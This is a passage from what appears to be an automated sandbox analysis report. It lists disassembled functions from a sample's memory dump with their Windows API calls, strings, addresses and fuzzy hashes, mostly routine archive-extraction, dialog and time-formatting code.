                                                                              • _free.LIBCMT ref: 00D4DDAB
                                                                              • _free.LIBCMT ref: 00D4DDE3
                                                                              • _free.LIBCMT ref: 00D4DDEA
                                                                              • _free.LIBCMT ref: 00D4DE07
                                                                              • _free.LIBCMT ref: 00D4DE1F
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              • Opcode ID: 42dda2de083c985d4f368e13153dce7266a9b8373f1c5bc357b9267a920e0532
                                                                              • Instruction ID: cdcaf7a8d12db22025344c3105107688c827415ca4a5ce0835f9debc57d6a64e
                                                                              • Opcode Fuzzy Hash: 42dda2de083c985d4f368e13153dce7266a9b8373f1c5bc357b9267a920e0532
                                                                              • Instruction Fuzzy Hash: 20314731A047049FEB21AB38D845B5AB3EAFF10710F5D482AF489DB191DB31AC90CB75
                                                                              Function 00D3A6D1 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00D3A6F6
                                                                              • _wcslen.LIBCMT ref: 00D3A796
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00D3A7A5
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D3A7C6
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D3A7ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                              • API String ID: 1777411235-4209811716
                                                                              • Opcode ID: 0d2be080d8c08b8981e9ee9164222d07cd42527ba2ef2178396d99000b168bff
                                                                              • Instruction ID: d5bcd8e742cde6711094456bb45db65225a07f21f35950d7c73fdd0803377d0b
                                                                              • Opcode Fuzzy Hash: 0d2be080d8c08b8981e9ee9164222d07cd42527ba2ef2178396d99000b168bff
                                                                              • Instruction Fuzzy Hash: 043146722043517FE716AB78AC86F6FB7A8EF41321F18011EF841961D1EFA4D94983B6
                                                                              Function 00D3E7EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindow.USER32(?,00000005), ref: 00D3E811
                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00D3E83D
                                                                                • Part of subcall function 00D33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00D2D523,00000000,.exe,?,?,00000800,?,?,?,00D39E5C), ref: 00D3332C
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00D3E859
                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D3E870
                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D3E884
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D3E8AD
                                                                              • DeleteObject.GDI32(00000000), ref: 00D3E8B4
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00D3E8BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                              • String ID: STATIC
                                                                              • API String ID: 3820355801-1882779555
                                                                              • Opcode ID: e9dda23039cff05a990122ea374c4edf9dde6aca881fc810006cbb269f2facdb
                                                                              • Instruction ID: 42e2a5a5f52f9d1ec9b4acab50c4f763ff24b9189365a955279ddbb6ba739dea
                                                                              • Opcode Fuzzy Hash: e9dda23039cff05a990122ea374c4edf9dde6aca881fc810006cbb269f2facdb
                                                                              • Instruction Fuzzy Hash: 9711E132941B117BE6206B60EC4EFAF3B9DEF94711F040131FA41E52DADBA4890587B5
                                                                              Function 00D4A421 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00D4A435
                                                                                • Part of subcall function 00D4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?), ref: 00D4A680
                                                                                • Part of subcall function 00D4A66A: GetLastError.KERNEL32(?,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?,?), ref: 00D4A692
                                                                              • _free.LIBCMT ref: 00D4A441
                                                                              • _free.LIBCMT ref: 00D4A44C
                                                                              • _free.LIBCMT ref: 00D4A457
                                                                              • _free.LIBCMT ref: 00D4A462
                                                                              • _free.LIBCMT ref: 00D4A46D
                                                                              • _free.LIBCMT ref: 00D4A478
                                                                              • _free.LIBCMT ref: 00D4A483
                                                                              • _free.LIBCMT ref: 00D4A48E
                                                                              • _free.LIBCMT ref: 00D4A49C
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: bc56bb6b84d8730a6de02d84afa1933e0768c38637507490544a4ab510f63c3d
                                                                              • Instruction ID: 69334909f25708be9f9e34068a8b0ef9ef1dda267f8e0e51ae24417c7b65d81a
                                                                              • Opcode Fuzzy Hash: bc56bb6b84d8730a6de02d84afa1933e0768c38637507490544a4ab510f63c3d
                                                                              • Instruction Fuzzy Hash: 8C11A776150508AFCB01EF58C852CD93BB5EF14750F9A81A5FA084B222D631DE619B71
                                                                              Function 00D43FC1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 322700389-393685449
                                                                              • Opcode ID: d5845b32e63ca0ea7d45fbad4c257a19570550dbb8e59a84a0880e9d05a39565
                                                                              • Instruction ID: 09dcee4db39c238045fae26d880d8f2e613b241c5a179866c67f6786f40bae6c
                                                                              • Opcode Fuzzy Hash: d5845b32e63ca0ea7d45fbad4c257a19570550dbb8e59a84a0880e9d05a39565
                                                                              • Instruction Fuzzy Hash: 63B16C7580020AEFCF25DFA8C881AAEBBB5FF14310F19415AF8156B212D771DA91CBB5
                                                                              Function 00D3C7B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D212F6: GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                                • Part of subcall function 00D212F6: SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              • EndDialog.USER32(?,00000001), ref: 00D3C800
                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D3C827
                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D3C840
                                                                              • SetWindowTextW.USER32(?,?), ref: 00D3C851
                                                                              • GetDlgItem.USER32(?,00000065), ref: 00D3C85A
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D3C86E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D3C884
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                              • String ID: LICENSEDLG
                                                                              • API String ID: 3214253823-2177901306
                                                                              • Opcode ID: 78211feb9354d940a1dd6b2ac402948aff563976ff78dcabc81a2aa65ac440d9
                                                                              • Instruction ID: db2afd95b0265f103931c5fbcf591a6ee4119759c0ca72cab89236ad72784ac2
                                                                              • Opcode Fuzzy Hash: 78211feb9354d940a1dd6b2ac402948aff563976ff78dcabc81a2aa65ac440d9
                                                                              • Instruction Fuzzy Hash: F621E0762B0311BBD6115F69FC8DF7B7BACEB4AB85F044015F600F22A4CB6299019B71
                                                                              Function 00D2B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00D2B5E2
                                                                                • Part of subcall function 00D32701: GetSystemTime.KERNEL32(?), ref: 00D3270F
                                                                                • Part of subcall function 00D32701: SystemTimeToFileTime.KERNEL32(?,?), ref: 00D3271D
                                                                                • Part of subcall function 00D326AA: __aulldiv.LIBCMT ref: 00D326B3
                                                                              • __aulldiv.LIBCMT ref: 00D2B60E
                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00D2B615
                                                                              • _swprintf.LIBCMT ref: 00D2B640
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • _wcslen.LIBCMT ref: 00D2B64A
                                                                              • _swprintf.LIBCMT ref: 00D2B6A0
                                                                              • _wcslen.LIBCMT ref: 00D2B6AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                              • String ID: %u.%03u
                                                                              • API String ID: 2956649372-1114938957
                                                                              • Opcode ID: b9898e8cb197422c0a40a34503f5327835454e1947fb17bf9509a5b69b2a9df9
                                                                              • Instruction ID: d2c249a56e502d4ec246e86ddbb18bf04300d7a0c02465554efd518fbc0646be
                                                                              • Opcode Fuzzy Hash: b9898e8cb197422c0a40a34503f5327835454e1947fb17bf9509a5b69b2a9df9
                                                                              • Instruction Fuzzy Hash: 8821D6B2A083005FD610EF64DC86D6B77ECEFD4315F00492AF945E7241DA30D9088BB2
                                                                              Function 00D3BC2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3BC3F
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D3BC50
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D3BC5E
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3BC6C
                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D3BC87
                                                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00D3BCAE
                                                                              • _swprintf.LIBCMT ref: 00D3BCD4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                              • String ID: %s %s
                                                                              • API String ID: 385609497-2939940506
                                                                              • Opcode ID: c2d45f56c144f0da2e954626a9c27bd8f54a9812ac3f1bc167cf9b38f2e3d064
                                                                              • Instruction ID: 4f7fe1884066fb0f5fb6a761f5a6fe9564bce529a4b4e522d181c1e7853c373a
                                                                              • Opcode Fuzzy Hash: c2d45f56c144f0da2e954626a9c27bd8f54a9812ac3f1bc167cf9b38f2e3d064
                                                                              • Instruction Fuzzy Hash: C321C3B254125CABDB21DFA0EC45EEF3BACFF19309F140426FE09D2111E6209A898B71
                                                                              Function 00D40ED0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00D2C43F,00D2C441,00000000,00000000,7731757A,00000001,00000000,00000000,00D2C32C,?,?,?,00D2C43F,ROOT\CIMV2), ref: 00D40F59
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00D2C43F,?,00000000,00000000,?,?,?,?,?,00D2C43F), ref: 00D40FD4
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00D40FDF
                                                                              • _com_issue_error.COMSUPP ref: 00D41008
                                                                              • _com_issue_error.COMSUPP ref: 00D41012
                                                                              • GetLastError.KERNEL32(80070057,7731757A,00000001,00000000,00000000,00D2C32C,?,?,?,00D2C43F,ROOT\CIMV2), ref: 00D41017
                                                                              • _com_issue_error.COMSUPP ref: 00D4102A
                                                                              • GetLastError.KERNEL32(00000000,?,00D2C43F,ROOT\CIMV2), ref: 00D41040
                                                                              • _com_issue_error.COMSUPP ref: 00D41053
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 1353541977-0
                                                                              • Opcode ID: 075a577d11debdfffb31ab6f28a1106025f9c71792c5ea23c02b3a20bdd3a73c
                                                                              • Instruction ID: f0827fa87cdee1ef683293fa2b3ae775b033c61b0b6a4a2e432fb9b53122ca29
                                                                              • Opcode Fuzzy Hash: 075a577d11debdfffb31ab6f28a1106025f9c71792c5ea23c02b3a20bdd3a73c
                                                                              • Instruction Fuzzy Hash: 1941F475A00315AFDB10DF68DC45BAEBBA8EF48711F14422AF905E7380DB75A8848BB5
                                                                              Function 00D2C3F7 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                              • API String ID: 3519838083-3505469590
                                                                              • Opcode ID: 545402c8a22e8f647aaa2326c49ebfd3685ddb3e083fe49ffc41443ee71577f9
                                                                              • Instruction ID: 5273742fc8aec56a61e5053d83094dda6447117462e6587528fe17b8377ca24c
                                                                              • Opcode Fuzzy Hash: 545402c8a22e8f647aaa2326c49ebfd3685ddb3e083fe49ffc41443ee71577f9
                                                                              • Instruction Fuzzy Hash: 90716B71A10329AFDF14DFA4D8949AEB7B9FF48319B144559E802E72A0CB30AD45CB70
                                                                              Function 00D3E8DF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00D3E8FE
                                                                              • ShowWindow.USER32(?,00000000), ref: 00D3EA6D
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00D3EAA9
                                                                              • CloseHandle.KERNEL32(?), ref: 00D3EACF
                                                                              • ShowWindow.USER32(?,00000001), ref: 00D3EB31
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
                                                                              • String ID: .exe$.inf
                                                                              • API String ID: 783751319-3750412487
                                                                              • Opcode ID: b65cccc4a682dd8c4da3662a6bfb76c5206c298c818d98ab8fbaad43f4e0f651
                                                                              • Instruction ID: 4aeded0582752a6a53ec25694e21a8af6b4b58ae34a2b6f55d70f0ee258d1827
                                                                              • Opcode Fuzzy Hash: b65cccc4a682dd8c4da3662a6bfb76c5206c298c818d98ab8fbaad43f4e0f651
                                                                              • Instruction Fuzzy Hash: 4851CF341483809ADB319B21D844BABBBE5AF80744F0C481DF9C5D72D1EB718989DB72
                                                                              Function 00D2A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D2A5EE
                                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D2A611
                                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D2A630
                                                                                • Part of subcall function 00D2D6A7: _wcslen.LIBCMT ref: 00D2D6AF
                                                                                • Part of subcall function 00D33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00D2D523,00000000,.exe,?,?,00000800,?,?,?,00D39E5C), ref: 00D3332C
                                                                              • _swprintf.LIBCMT ref: 00D2A6CC
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00D2A73B
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00D2A77B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                              • String ID: rtmp%d
                                                                              • API String ID: 3726343395-3303766350
                                                                              • Opcode ID: 5d215601d9e1f1634bf15b353d345155e4128f27941f82827032c6d541ddb7bf
                                                                              • Instruction ID: b56f08eba4382d958a47edd4930cf6da440984363ba461ecfcc0bb5f84b39415
                                                                              • Opcode Fuzzy Hash: 5d215601d9e1f1634bf15b353d345155e4128f27941f82827032c6d541ddb7bf
                                                                              • Instruction Fuzzy Hash: 82416E719006396BCF20ABA8EC54EEF737DEF64349F0804A5B545E3046DB348A858F75
                                                                              Function 00D32538 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __aulldiv.LIBCMT ref: 00D3254E
                                                                                • Part of subcall function 00D2C619: GetVersionExW.KERNEL32(?), ref: 00D2C63E
                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00D32571
